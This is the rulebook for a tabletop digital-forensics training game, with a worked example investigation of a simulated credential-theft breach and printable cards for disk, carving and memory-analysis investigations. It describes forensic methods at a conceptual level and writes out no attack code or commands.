Turn Count Randomization: - Select your chosen tier's baseline (6-8, 8-10, 11-13, or 14-15) - Roll d4: -1, 0, 0, or +1 - Add result to baseline to get final turn count - Example: TIER 2 (8-10) + d4 result of +1 = final turn count of 9-11 turns
Secret TO Preparation:
Consider realistic attack flow: not every attack needs all phases
Map Investigations: For each threat card, note which Investigation Actions would discover it
Example: Credential abuse → Event Log Analysis
Plan Evidence Discovery: Prepare which Evidence cards will be revealed as each Investigation Action succeeds
Some evidence cards might be discovered by multiple investigation paths
Set Attacker Profile: In your notes, decide:
Example Secret Setup (TIER 2):
Threat Cards Selected: Phishing → Credential Harvesting → Lateral Movement → Persistence → Exfiltration Turn Count: 8-10 (TIER 2, no roll modifier used) Attacker Profile: Eastern European cybercriminal group focused on financial data theft Key Evidence: Phishing email headers, malware samples, persistence mechanisms, C2 communications Attribution Clues: Russian language in malware, specific tool signature, Bitcoin payment addresses Investigation Challenge: Attacker deleted logs; Blue Team must reconstruct from network traffic and memory forensics
Read the Incident Briefing to all investigators:
INCIDENT BRIEFING
"You've been called by [Company Name] to investigate a data breach discovered during routine system maintenance. Here's what we know so far:
Timeline of Discovery: - System administrator noticed unusual network traffic on [Date] - Forensic examination discovered evidence of system compromise dating back approximately [2-3 weeks / 1 month] - Data breach notification team estimates millions of records may have been accessed
What Was Affected: - Database servers containing customer information - Admin accounts showing unauthorized access - Backup systems with potential exfiltration evidence
Your Mission: - Reconstruct the complete attack chain (how did they get in? what did they do? how did they get out?) - Identify what data was compromised (scope and sensitivity) - Attribute the attack to a known threat group or attacker profile if possible - Produce findings for the company's security hardening and incident prevention
Resources Available: - Forensic laboratory time: 75 Budget units - [Optional: +25 if company has cyber insurance or threat intelligence subscription] - Investigation period: [TURN COUNT] turns (represents [1-3 weeks] of forensic work)
Regulatory Context: - Time-sensitive: Investigation results feed into breach notification requirements - Chain of custody critical: Findings must be admissible if this goes to law enforcement
You have [TURN COUNT] turns. Begin your investigation."
On a shared board or spreadsheet, create:
One investigator (or the whole team collectively) describes what forensic investigation they want to perform.
Options:
Option A: Conduct Investigation - Choose an Investigation Action card (Disk Forensics, Memory Analysis, Log Analysis, Network Traffic, Malware Analysis, Timeline Reconstruction, or Threat Attribution) - Describe HOW they'll conduct the investigation (methodology, tools, expected findings) - Declare the Budget cost (shown on card) — paid on the turn you start - Note the card's Duration (v2.2): starting the investigation is your action this turn; counting this turn as turn 1, the roll and results arrive at the START of turn N (Duration 1 = same turn, Duration 2 = start of next turn, Duration 3 = two turns later). Only ONE multi-turn investigation may be in flight at a time; you may take other actions while waiting. - Example: "We'll do a full disk image of the compromised database server and look for persistence mechanisms, rootkits, and artifact evidence. Cost 10 Budget, Duration 2 — results at the start of next turn."
Option B: Analyze Existing Evidence — Cost: 5 Budget (v2.2) - Review 2-4 Evidence cards already discovered — each Evidence card can be Analyzed only once (v2.2); mark cards as Analyzed - Describe connections between findings (temporal sequence, technical relationships, or attribution links) - Example: "The malware sample matches the persistence mechanism we found in scheduled tasks, suggesting the attacker knew exactly what they were doing. Plus, the C2 domain was registered by the same person who registered two other domains we found in old breach reports."
Option C: Follow Investigative Lead — Cost: 5 Budget (v2.2) - Pick an Evidence card with an "Investigative Lead" noted - Describe how you'll pursue this lead - Example: "This C2 domain resolves to a Russian ASN. Let's do a WHOIS lookup and see what other domains are hosted on this infrastructure."
For Conduct Investigation or Follow Investigative Lead:
If insufficient Budget, investigation cannot proceed (suggest alternative action)
Apply Duration (v2.2): For a Duration 2-3 investigation, the cost and action are spent now, but steps 3-5 happen at the START of the turn the investigation completes (Duration 1 resolves immediately)
Set Difficulty Class (DC): TO checks Investigation Action card for DC
Modify DC if attacker was sophisticated: +1-2 DC
Determine Modifiers: Apply skill modifiers to the roll
-2 if attempting hastily (rushed, final turn desperation) (v2.2)
Roll: Investigator (or TO on their behalf) rolls d20
Compare Results:
For Analyze Existing Evidence:
| Card | DC | Cost | Duration | What It Reveals |
|---|---|---|---|---|
| DISK-01: Disk Image & Analysis | 12 | 10 | 2 turns | Deleted files, malware samples, persistence mechanisms |
| DISK-02: File System Carving | 14 | 15 | 3 turns | Deep file recovery, hidden artifacts, encrypted data |
| MEM-01: Memory Dump & Analysis | 13 | 15 | 2 turns | Volatile processes, injected code, C2 connections |
| MEM-02: Memory Forensics Deep Dive | 15 | 20 | 3 turns | Malware behavior analysis, encryption keys, exploits |
| LOG-01: Event Log Analysis | 11 | 5 | 1 turn | User login timeline, privilege escalation, admin actions |
| LOG-02: Deep Log Correlation | 13 | 10 | 2 turns | Cross-system timeline, attack sequence, lateral movement |
| NET-01: Network Traffic Analysis | 12 | 10 | 2 turns | Exfiltration evidence, C2 communications, data flows |
| NET-02: Packet Capture Deep Analysis | 14 | 15 | 3 turns | Protocol forensics, attacker tools, communication patterns |
| MALW-01: Malware Analysis (Dynamic) | 12 | 15 | 2 turns | Behavior analysis, IOCs, capabilities |
| MALW-02: Malware Analysis (Static) | 14 | 10 | 2 turns | Code reverse engineering, attacker signatures, techniques |
| TIMELINE-01: Timeline Reconstruction | 13 | 5 | 1 turn | Chronological attack sequence, entry and exit points |
| THREAT-01: Threat Attribution Analysis | 15 | 20 | 3 turns | Link to known threat groups, TTPs, motivation |
DISK-01 rush option (v2.2): pay +5 Budget (15 total) to run it at Duration 1. Duration rule: results arrive at the start of the turn the Duration completes — see Turn Sequence.
Blue Team wins if they achieve ONE of these (canonical v2.2 conditions — identical to the module rules):
Victory Condition 1: "Full Attribution" - Attribution Confidence ≥ 90% AND Timeline Completeness ≥ 80% - Result: "You have successfully attributed this attack to [Threat Group]. Intelligence briefing prepared for leadership."
Victory Condition 2: "Solid Case" - Timeline Completeness ≥ 80% AND Attack Chain Reconstruction ≥ 80% AND Evidence Chain of Custody ≥ 70% - Result: "Your forensic investigation is publishable quality and legally defensible. Law enforcement briefed."
Victory Condition 3: "Partial Findings" - Any two Progress Meters ≥ 70% at game end - Result: "Investigation concluded with sufficient findings for remediation. Hardening team can now implement controls."
Blue Team fails if, at the turn limit, no victory condition is met.
Precedence (v2.2): Victory conditions are always checked FIRST. There is no "any meter < 40% = failure" clause (deleted — it conflicted with Victory Condition 3), and budget exhaustion is not a loss: you may always fall back on the cheap 5-Budget actions while Budget lasts, and the game simply plays out to the turn limit.
Result of failure: "Investigation stalled. Too many unanswered questions. Threat actor remains unidentified. Forensic team recommends additional investigation by external firm."
Consequence of Failure: - Investigation results are incomplete and cannot feed into Hardening or Network Building modules - Audit & Compliance module must assess security posture with incomplete information - Organization loses confidence in threat intelligence
TIER 2 attack: Credential-based lateral movement with persistence Turn limit: 8 turns (TIER 2 baseline 9, d4 roll of -1) Attacker profile: Eastern European cybercriminal group Key technique: Password spray → Privilege escalation → Scheduled task persistence → Data exfiltration Bonus: The sysadmin's initial triage captured a suspicious binary, so a malware sample is available from turn 1
Blue Team: "We'll start with event log analysis of the compromised database server. We want to see the login history and identify unusual access patterns. We'll export the logs with their digital signatures and hash the export."
Investigator Skill: IT Security background (+1)
TO Facilitator: 1. Check Cost: LOG-01 costs 5 Budget. Current budget 75. ✓ OK 2. Check Duration: LOG-01 is Duration 1 — resolves this turn 3. Set DC: LOG-01 has DC 11. No anti-forensics. DC = 11 4. Apply Modifiers: +1 (IT security background) + 0 (no prior clues) = +1 total 5. Roll: Investigator rolls d20+1. d20 = 13, total 14 6. Success! (14 ≥ 11) → Discover Evidence card EVD-04 "Suspicious Admin Login (Timeline)" — apply ONLY its printed impacts (v2.2 No Double Counting)
Update Tracking: - Budget: 75 - 5 = 70 remaining - Turn: 1 → 2 - EVD-04 printed impacts: Timeline 0% → 25%, Attack Chain 0% → 20%, Attribution 0% → 10% - Chain of Custody: 0% → 5% (v2.2: preservation stated — signed log export, hashed) - Evidence Log: "EVD-04 - discovered via LOG-01 - preserved via signed/hashed export - Chain of Custody: intact"
Blue Team Deduction: "Looks like an admin account was accessed from unusual locations. Might be credential theft."
Blue Team: "Let's analyze that malware sample from triage. We want to understand what it does and where it connects to."
Investigator Skill: Forensic certification background (+2)
TO Facilitator: 1. Check Cost: MALW-01 costs 15 Budget. Current budget 70. ✓ OK 2. Check Duration (v2.2): MALW-01 is Duration 2. Starting the sandbox run is this turn's action; the roll and results arrive at the START of turn 3. MALW-01 is now the one multi-turn investigation in flight.
Update Tracking: - Budget: 70 - 15 = 55 remaining - Turn: 2 → 3 - Meters: unchanged (results pending) — Timeline 25%, Attack Chain 20%, Attribution 10%, Chain of Custody 5%
Start of turn — MALW-01 resolves (v2.2 Duration): 1. Set DC: MALW-01 has DC 12. Attacker was moderately sophisticated: +1. DC = 13 2. Apply Modifiers: +2 (forensic cert) 3. Roll: d20 = 14, total 16 4. Success! (16 ≥ 13) → Discover EVD-02 "Command-and-Control Callback Domain" - EVD-02 printed impacts: Attack Chain 20% → 35%, Attribution 10% → 35%, Timeline 25% → 30% - Chain of Custody: 5% → 10% (v2.2: sample hashed, sandbox logs archived)
Turn 3 action — Blue Team: "Now let's look at network flow records for that C2 domain. Start NET-01."
TO Facilitator: NET-01 costs 10 (budget 55 → 45 ✓), Duration 2 — resolves at the start of turn 4. (Allowed: MALW-01 finished this turn, so only one investigation is in flight.)
Update Tracking: - Budget: 45 remaining - Turn: 3 → 4 - Meters: Timeline 30%, Attack Chain 35%, Attribution 35%, Chain of Custody 10%
Blue Team Deduction: "The malware communicates with an external server. That's how the attacker stays in control."
Start of turn — NET-01 resolves (v2.2 Duration): 1. Set DC: NET-01 has DC 12 2. Apply Modifiers: +1 (IT security background) 3. Roll: d20 = 9, total 10 4. Partial Success (10 is in the DC-2 to DC-1 band, 10-11) → Suspicious outbound traffic found, but the destination is unclear. No Evidence card produced, so apply NET-01's partial advance line: Attack Chain 35% → 45%, Attribution 35% → 40%. No Chain of Custody handling bonus (no Evidence card discovered).
Turn 4 action — Blue Team: "Let's try to reconstruct the timeline from what we have. TIMELINE-01."
TO Facilitator: TIMELINE-01 costs 5 (budget 45 → 40 ✓), Duration 1 — resolves now. DC 13, +2 (DFIR training). Roll: d20 = 8, total 10. Failure (10 < 11, below the DC-2 partial band). Too many timestamp gaps. Budget still spent.
Update Tracking: - Budget: 40 remaining - Turn: 4 → 5 - Meters: Timeline 30%, Attack Chain 45%, Attribution 40%, Chain of Custody 10%
Blue Team: "This is expensive, but let's start the Memory Forensics Deep Dive on the admin workstation. If the attacker has malware in memory, we might find encryption keys or recent commands that show their intent."
TO Facilitator: 1. Check Cost: MEM-02 costs 20 Budget. Current budget 40. ✓ OK 2. Check Duration (v2.2): MEM-02 is Duration 3 — started this turn (turn 1 of 3), it resolves at the START of turn 7. It is now the one multi-turn investigation in flight.
Update Tracking: - Budget: 40 - 20 = 20 remaining - Turn: 5 → 6 - Meters: unchanged (results pending)
Blue Team: "While the memory analysis runs, let's Analyze our existing evidence. The suspicious admin login (EVD-04, T1078 Valid Accounts) lines up with the C2 callbacks (EVD-02, T1071 Application Layer Protocol): the login happened 20 minutes before the first beacon. This was credential theft followed by remote control."
TO Facilitator: 1. Check Cost: Analyze Existing Evidence costs 5 (v2.2). Budget 20 → 15 ✓. (Allowed while MEM-02 is in flight — Analyze is not an investigation.) 2. Check cards: EVD-04 and EVD-02 have not been Analyzed before ✓ — mark both as Analyzed (v2.2: each Evidence card only once) 3. Modifiers: +1 (references specific MITRE ATT&CK techniques) + 1 (IT security background) = +2 4. Roll: d20 = 12, total 14 vs. DC 10. Success! → Advance two meters by 10% each: Timeline 30% → 40%, Attribution 40% → 50%
Update Tracking: - Budget: 15 remaining - Turn: 6 → 7 - Meters: Timeline 40%, Attack Chain 45%, Attribution 50%, Chain of Custody 10%
Blue Team Deduction: "Credential theft, then hands-on-keyboard control. Now we need the memory results."
Start of turn — MEM-02 resolves (v2.2 Duration, started turn 5): 1. Set DC: MEM-02 has DC 15 2. Apply Modifiers: +2 (forensic analyst) + 1 (MALW-01 already completed) = +3 3. Roll: d20 = 11, total 14 4. Partial Success (14 is in the DC-2 to DC-1 band, 13-14) → Discover ONE complete Evidence card, EVD-09 "Attacker Command History", plus an INCOMPLETE second finding (fragments of an RC4 key — marked INCOMPLETE, no meter impact until completed or interpreted) - EVD-09 printed impacts: Timeline 40% → 65%, Attack Chain 45% → 70%, Attribution 50% → 65%, Chain of Custody 10% → 20% - Chain of Custody: 20% → 25% (v2.2: memory image hashed, extraction methodology documented)
Turn 7 action — Blue Team: "Follow the investigative lead on EVD-02: WHOIS and ASN lookup on the C2 domain to map related attacker infrastructure."
TO Facilitator: 1. Check Cost: Follow Investigative Lead costs 5 (v2.2). Budget 15 → 10 ✓ 2. Set DC: 12 3. Apply Modifiers: +2 (detailed approach referencing prior evidence) 4. Roll: d20 = 14, total 16. Success! → Discover EVD-07 "Attacker Infrastructure Map" — apply its printed impacts (v2.2: no separate +20% Attribution bonus — No Double Counting) - EVD-07 printed impacts: Attribution 65% → 95%, Attack Chain 70% → 85%, Timeline 65% → 75% - Chain of Custody: 25% → 30% (v2.2: WHOIS records and passive-DNS exports archived)
Update Tracking: - Budget: 10 remaining - Turn: 7 → 8 of 8 (final turn) - Meters: Timeline 75%, Attack Chain 85%, Attribution 95%, Chain of Custody 30%
Victory check: Condition 1 needs Attribution ≥ 90% ✓ (95%) AND Timeline ≥ 80% ✗ (75%). Not yet. Condition 2 needs Timeline ≥ 80% ✗. Play on.
Blue Team: "One more push on the timeline. We retry TIMELINE-01, now synthesizing the login timeline (EVD-04), the C2 beacons (EVD-02), and the attacker's command history (EVD-09)."
TO Facilitator: 1. Check Cost: TIMELINE-01 costs 5. Budget 10 → 5 ✓. Duration 1 — resolves now. 2. Set DC: 13 3. Apply Modifiers: +2 (DFIR training) + 1 (prior investigations provide clues) = +3 4. Roll: d20 = 15, total 18. Success! All timeline-type evidence has already been discovered, so no new Evidence card is produced — apply TIMELINE-01's own advance line instead (v2.2 No Double Counting): Timeline 75% → 100%, Attack Chain 85% → 100%
Update Tracking: - Budget: 5 remaining - Turn: 8 of 8 — game end - Final meters: Timeline 100%, Attack Chain 100%, Attribution 95%, Chain of Custody 30%
Check Victory Conditions (v2.2 — victory is checked first, never overridden by a low meter):
Condition 1 "Full Attribution": Attribution ≥ 90% AND Timeline ≥ 80%? - Attribution: 95% ✓ - Timeline: 100% ✓ - YES! VICTORY CONDITION 1 MET!
(For completeness: Condition 2 "Solid Case" fails on Chain of Custody 30% < 70%; Condition 3 "Partial Findings" would also be met with three meters ≥ 70% at game end. Note the v2.2 precedence rule: Chain of Custody sitting at 30% does NOT cause a failure — the old "any meter < 40%" clause is deleted. Meter averages are never used.)
Game Ends with VICTORY
Investigation Result: "Your forensic investigation successfully identified the attacker as a member of the [Eastern European Cybercriminal Group]. Key findings: - Attack vector: Credential theft via password spray - Control: C2 beaconing from checkupdate-style domains, hands-on-keyboard commands recovered from memory - Timeline: fully reconstructed from signed logs, beacon timing, and command history - Attribution: 95% confidence linked to known group via infrastructure map - Caveat: evidence admissibility is weak (Chain of Custody 30%) — fine for hardening, not for court
Recommendations: 1. Implement multi-factor authentication on admin accounts 2. Deploy EDR solution to detect persistence mechanisms 3. Implement network segmentation to limit lateral movement 4. Increase logging and monitoring of admin activities
This investigation will inform the Hardening, Network Building, and Audit modules going forward."
Early Game (Turns 1-3): - Start with cheaper, lower DC investigations (Log Analysis, Timeline Reconstruction) - Build foundation of knowledge before attempting expensive techniques - Goal: 50%+ progress on any meter by turn 3
Mid Game (Turns 4-7): - Use findings from early investigations to guide more expensive deep dives - Follow Investigative Leads to get "bang for your budget" - Aim for 75%+ on at least two meters by turn 6
Late Game (Turns 8+): - If you have momentum, push for one complete meter (≥90%) - If budget is tight, focus on two meters reaching ≥70% (Condition 3) - Make bold investigations; you have less to lose
To Gain Bonuses: - Explain not just WHAT you'll investigate, but HOW and WHY - Reference specific evidence already discovered - Mention MITRE ATT&CK techniques you're looking for - Example (gains +2): "We found a persistence mechanism in the scheduled tasks. This matches T1053 (Scheduled Task/Job). Let's do Memory Forensics to find if the malware is still resident in RAM and tracking recent C2 communications."
Create Connections: - Note which investigations led to which evidence cards - Look for patterns: "All malware samples have Russian-language strings" - Timeline building: "Login at 2:15, C2 connection at 2:10, exfiltration at 2:25" - These connections trigger Analyze Evidence action and drive attribution forward
Turn 8+: Each turn matters. Budget running low. Critical decisions.
If game is ending early (Victory Condition 1 or 2 before turn 6): Let it happen. Means they played smart. (Condition 3 is only checked at game end.)
For Beginner Investigators: - Use TIER 1 attacks (6-8 turns, low DC, no anti-forensics) - Provide hints during briefing ("We recovered a memory dump") - Allow retries on failed Investigation Actions
For Experienced Investigators: - Use TIER 3-4 attacks (11-15 turns, high DC, sophisticated anti-forensics) - Limit Budget more strictly - Add False Evidence cards (partial investigation leads to wrong conclusion)
After game concludes, facilitate discussion:
On Investigation Process: 1. Which investigation technique was most valuable? Why? 2. What would you do differently with more budget? 3. What evidence was hardest to interpret? 4. How did you decide which investigation to do next?
On Attack Reconstruction: 1. Walk through the attack chain step-by-step. What happened first? Last? 2. How did the attacker maintain access without being detected immediately? 3. What's one technique that could have prevented this entire attack?
On Attribution: 1. What evidence pointed to the attacker's identity? 2. How confident are you in the attribution? (At 75%? 90%?) 3. What additional evidence would make you 95%+ confident?
On Real-World Forensics: 1. How does this compare to actual forensic investigations you've studied? 2. What tools mentioned in the game (memory forensics, malware analysis) are used in real incident response? 3. Why does attribution matter? (Law enforcement, threat intelligence sharing, policy response)
On Lessons Learned: 1. What control from Hardening module could have detected this attack early? 2. How would Network Building architecture limit lateral movement? 3. What Audit & Compliance questions need to be answered?
Modified Rules: Reduce turn count by 3 (so 3-7 turns instead of 6-10)
Effect: Creates higher stakes; investigators must make faster decisions; less time for methodical analysis
When to Use: Advanced investigators who want more challenge; time-limited classroom sessions
Modified Rules: TO secretly includes 1-2 "False Evidence" cards that appear legitimate but are actually red herrings
Effect: Attribution becomes harder; investigators must corroborate findings; critical thinking required
Example: Malware sample analysis reveals Russian-language strings → seems like Eastern European group. But it was actually planted by another threat group to frame competitors.
When to Use: Teaching about false positives and need for corroboration
Modified Rules: Start with 40% progress already on one or two meters (from prior investigation by another team)
Effect: Investigators build on existing findings rather than starting from scratch
When to Use: Teaching how investigations are handed off; continuing previous work
Modified Rules: Two teams of investigators compete to achieve highest progress on most meters
Scoring: +3 points per meter ≥ 90%, +2 points per meter 70-89%, +1 per meter 40-69%
When to Use: Competitive classroom tournament; multiple teams investigating same breach simultaneously
30-minute Warm-up: Forensics solo (TIER 1, 6-turn simplified scenario)
90-minute Session: Incident Response (45 min) + Forensics (45 min) - Phase 1: IR team detects attack chain - Phase 2: Forensics team investigates findings
120-minute Session: Incident Response → Disaster Recovery mini → Forensics - Phase 1: IR failure (breach not contained) - Phase 2: DR (crisis management, brief) - Phase 3: Forensics (investigation & attribution)
180+ minute Session: Complete lifecycle with Forensics - Network Building (45 min) → Hardening (45 min) → Incident Response (45 min) → Forensics (30 min)
Setup: Choose TIER (1-4), Roll d4, Announce turn count and starting budget (75)
Each Turn: 1. Resolve arrivals (v2.2): Any Duration 2-3 investigation completing this turn rolls and resolves at the start of the turn 2. Choose action: Conduct Investigation (card cost, Duration 1-3), Analyze Evidence (5 Budget, each Evidence card only once), or Follow Lead (5 Budget) 3. Pay cost: Deduct Budget 4. Roll d20: Add skill modifier, compare to DC (partial success on DC-2 to DC-1); Duration 2-3 investigations roll when they complete 5. Resolve: Discover evidence (apply the Evidence card's printed impacts — never also the investigation card's advance line), or fail 6. Update: Budget, Turn counter, Progress Meters (+5% Chain of Custody per Evidence discovery with stated preservation)
Resources: - Budget: 75 (represents forensic lab time; tracker range 0-100) - Turns: 6-15 (depends on tier + d4 roll) - Progress Meters: Timeline, Attack Chain, Attribution, Chain of Custody (each 0-100%)
Victory (v2.2): - V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80% - V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70% - V3 "Partial Findings": any two meters ≥70% at game end
Failure (v2.2): At the turn limit, no victory condition met. Victory is checked first — there is no meter-minimum failure clause, and budget exhaustion is not a loss. investigation
Before playing, ensure you have:
[ ] Timeline & Attribution (2 cards)
[ ] 12 Evidence Cards (printable from cards/forensics/core-deck/)
[ ] Attack Activity (3 cards: EVD-09, EVD-11, EVD-12)
[ ] 4 Findings Cards
[ ] FIND-04: Investigative Gaps & Recommendations
[ ] 1d20 die
Q: Can I play Forensics if I've never played Incident Response? A: Yes! Forensics standalone is completely self-contained. You don't need to have played IR, Hardening, or any other module first.
Q: How long does Forensics take? A: Typically 45-90 minutes depending on group experience level and decision speed. Experienced investigators finish faster.
Q: Can I play Forensics with a large group? A: Yes! 4-8 investigators is ideal. With more, split into two teams (each team has its own TO). You can even do competitive mode where both teams investigate the same breach.
Q: What if investigators want to know the tier? A: Don't tell them. Part of the game is discovering how sophisticated the attacker is through evidence analysis. Let them discover it.
Q: What if we run out of budget before solving the case? A: That's a realistic outcome, and it is NOT an automatic loss (v2.2). Keep playing to the turn limit — the cheap 5-Budget actions (Analyze Evidence, Follow Lead, LOG-01, TIMELINE-01) stretch a thin budget, and at game end you check victory normally. If any two meters are ≥70% at game end, you win via Condition 3 (like real-world investigations with incomplete findings). If no condition is met at the turn limit, the investigation is inconclusive.
Q: Can we retry a failed investigation? A: You can attempt the same investigation again next turn (costs full budget again), but you still don't know if you'll succeed. You're essentially re-investigating the same evidence looking for something you missed.
All printable cards are available in: - cards/forensics/core-deck/investigation-cards.md — 12 Investigation Action cards - cards/forensics/core-deck/evidence-cards.md — 12 Evidence cards + 4 Findings cards (Findings section)
Progress Meter Tracker: print templates coming in the print pack. Until then, draw a simple 4-meter tracker on paper: four rows labeled Timeline Completeness, Attack Chain Reconstruction, Attribution Confidence, and Evidence Chain of Custody, each marked 0-100% in 5% steps, plus a Turn row and a Budget row (0-100).
Ready to investigate? Print your cards, gather 1-4 forensic analysts, and begin your investigation. Good luck!
cards/forensics/core-deck/investigation-cards.md
Version: 2.2 - Playtest Edition Card Count: 12 Investigation Action Cards Printable: Yes (see printing instructions below)
Investigation Action cards represent specific forensic analysis techniques that investigators can deploy to discover evidence about the attack. Each card has a Difficulty Class (DC) that represents the skill required to successfully complete the investigation, a Cost in Budget, and a Duration showing how many turns the investigation takes.
Duration rule (v2.2): Starting an investigation with Duration N occupies your action (and its Budget cost) on the turn you start it. Counting that turn as turn 1, the roll is made and the results arrive at the START of turn N — so Duration 1 resolves immediately, Duration 2 at the start of the next turn, Duration 3 two turns after starting. Only ONE multi-turn investigation may be in flight at a time; you may take other actions while waiting.
No Double Counting (v2.2): When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts (plus the +5% Chain of Custody handling bonus for stating how it was preserved). The "Advance" line in each card's SUCCESS block applies only when no Evidence card is produced (e.g., no suitable undiscovered Evidence remains); partial-success advance lines apply as printed.
Each Investigation Action Card includes: - Card ID: Unique identifier (DISK-01, MEM-01, LOG-01, etc.) - Title: Name of investigation technique - MITRE ATT&CK: Referenced technique(s) this investigation detects - Difficulty Class (DC): Roll d20+modifiers vs. this to succeed (typically 11-15) - Cost: Budget units required - Duration: Number of turns investigation takes - Description: What the investigation does and what evidence it reveals - Success Conditions: What happens on success, partial success, or failure - Chain of Custody Notes: Any admissibility or documentation concerns
╔════════════════════════════════════════════════════════════════╗
║ DISK-01: DISK IMAGE & ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Forensic Disk Imaging & Analysis ║
║ MITRE ATT&CK: T1005 (Data from Local System), T1025 (Data from ║
║ Removable Media) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12 ║
║ Budget Cost: 10 ║
║ Duration: 2 turns (v2.2 rush: pay +5 Budget for Duration 1) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Create a bit-for-bit disk image of the compromised system, ║
║ then examine file system artifacts, deleted files, and ║
║ hidden data. This is a foundational forensic technique. ║
║ ║
║ What You're Looking For: ║
║ - Malware files (executables, scripts, libraries) ║
║ - Deleted files (file carving reveals overwritten data) ║
║ - Persistence mechanisms (startup folders, registry runs) ║
║ - Downloaded files (browser cache, temp directories) ║
║ - Suspicious file timestamps (backdating, mismatches) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12): ║
║ Discover ONE Evidence card from: Malware Sample, Persistence ║
║ Mechanism, or Downloaded Malware evidence set. ║
║ Advance (only if no Evidence card produced): ║
║ Timeline Completeness +10%, Attack Chain +15% ║
║ ║
║ PARTIAL SUCCESS (roll DC-2 to DC-1 = 10-11): ║
║ Discover INCOMPLETE Evidence card (partial findings). ║
║ Advance: Timeline Completeness +5%, Attack Chain +5% ║
║ ║
║ FAILURE (roll < 10): ║
║ No evidence discovered. Budget still spent. Take a turn. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Disk image must be bit-for-bit copy. Chain of custody: ║
║ Strong - Imaging is gold standard in forensics. ║
║ ✓ All evidence from this source is admissible in court ║
║ ║
║ SKILL MODIFIERS: ║
║ +2 if investigator has formal GCIH/GCFE training ║
║ +1 if investigator has IT administration background ║
║ +1 if team provides detailed explanation of imaging process ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Disk imaging is time-consuming (hence 2 turn cost) ║
║ • Can be combined with DISK-02 for deeper analysis ║
║ • Foundation for all disk-based forensic work ║
║ • Works best on traditional disk systems (less effective on ║
║ SSDs with wear-leveling and TRIM commands) ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ DISK-02: FILE SYSTEM CARVING ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced File Recovery & Data Carving ║
║ MITRE ATT&CK: T1074 (Data Staged), T1485 (Data Destruction) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14 ║
║ Budget Cost: 15 ║
║ Duration: 3 turns (specialized expertise required) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Advanced carving techniques recover data from unallocated ║
║ disk space and file slack, even when files have been deleted ║
║ and storage sectors overwritten. Uses specialized tools like ║
║ EnCase, FTK, or open-source carving tools. ║
║ ║
║ What You're Looking For: ║
║ - Deleted malware (recovered from free space) ║
║ - Temporary files (attacker staging data before exfil) ║
║ - Encryption keys or passphrases (memory remnants on disk) ║
║ - Hidden partitions or file systems ║
║ - Slack space artifacts ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14): ║
║ Discover ONE Evidence card from: Deep Malware Samples, ║
║ Encryption Keys Found, or Hidden Backdoor evidence. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Chain of Custody +10% ║
║ ║
║ PARTIAL SUCCESS (roll 12-13): ║
║ Discover partial data (e.g., fragments of deleted file). ║
║ Advance: Attack Chain +10%, Chain of Custody +5% ║
║ ║
║ FAILURE (roll < 12): ║
║ Data too corrupted or already overwritten. No recovery. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Carving is technically sound but must be documented carefully. ║
║ Chain of Custody: Strong if done by certified analyst. ║
║ ⚠ Partial carving may be challenged in court (incomplete ║
║ file recovery). Recommend combining with other techniques. ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has GCFE (Certified Forensic Examiner) ║
║ +1 if investigator has disk forensics experience ║
║ +1 if combined with DISK-01 investigation already done ║
║ -1 if SSD drives present (wear-leveling complicates carving) ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Expensive investigation (15 budget) for specialized work ║
║ • Can take weeks in real incidents; represented as 3 turns ║
║ • Most valuable for discovering deleted persistence and ║
║ encryption keys ║
║ • Less effective on modern systems with TRIM/wear-leveling ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ MEM-01: MEMORY DUMP & ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Volatile Memory Forensics (RAM analysis) ║
║ MITRE ATT&CK: T1055 (Process Injection), T1057 (Process ║
║ Discovery), T1518 (Software Discovery) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13 ║
║ Budget Cost: 15 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Capture RAM (volatile memory) from running system during ║
║ incident response, then analyze for active processes, malware, ║
║ injected code, network connections, and encryption keys in ║
║ memory. Uses tools like Volatility, Rekall, or proprietary ║
║ memory analysis suites. ║
║ ║
║ What You're Looking For: ║
║ - Malware processes running in memory ║
║ - Injected code (shellcode, DLLs in unexpected processes) ║
║ - Network connections (established C2 connections) ║
║ - Encryption keys and credentials in memory ║
║ - Command history from interactive shells ║
║ - Rootkit or kernel-level hooks ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13): ║
║ Discover ONE Evidence card from: Active Malware Process, ║
║ C2 Connection, or Injected Code evidence. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Timeline Completeness +10% ║
║ ║
║ PARTIAL SUCCESS (roll 11-12): ║
║ Discover evidence of suspicious process (incomplete details). ║
║ Advance: Attack Chain +10%, Timeline Completeness +5% ║
║ ║
║ FAILURE (roll < 11): ║
║ Malware may use anti-forensics in memory; analysis inconclusive║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Memory capture is volatile and must be done immediately. ║
║ Chain of Custody: Strong if documented with timestamps. ║
║ ✓ Admissible, but include disclaimer about volatile nature ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator trained in memory forensics (Volatility) ║
║ +1 if malware analysis background ║
